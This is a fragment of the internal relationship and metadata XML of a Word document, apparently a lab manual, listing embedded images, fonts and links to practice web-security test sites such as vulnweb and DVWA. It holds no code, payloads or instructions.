Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.jpg"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.jpg"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpg"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpg"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpg"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/dashboard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ckthakurcollege.net/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ho.is/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testasp.vulnweb.com/Login.asp" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/dvwa.mirror/" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.apachefriends.org/download.html" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.jpg"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.jpg"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.jpg"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.jpg"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://demo.t3-framework.org/joomla30/index.php/en/joomla-pages/sample-" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/login.php" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.jpg"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://demo.t3-framework.org/joomla30/index.php/en/joomla-pages/sample-" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.jpg"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94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Tahoma-regular.ttf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/NotoSansSymbols-bold.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/NotoSansSymbols-regular.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/CambriaMath-regular.ttf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/QuattrocentoSans-boldItalic.ttf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Tahoma-bold.ttf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/QuattrocentoSans-regular.ttf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/QuattrocentoSans-bold.ttf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/QuattrocentoSans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WDGordc50gUYI0Ys0u5SH+3M5Q==">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2024-12-22T16:49:00Z</dcterms:created>
  <dc:creator>ckt</dc:creator>
</cp:coreProperties>
</file>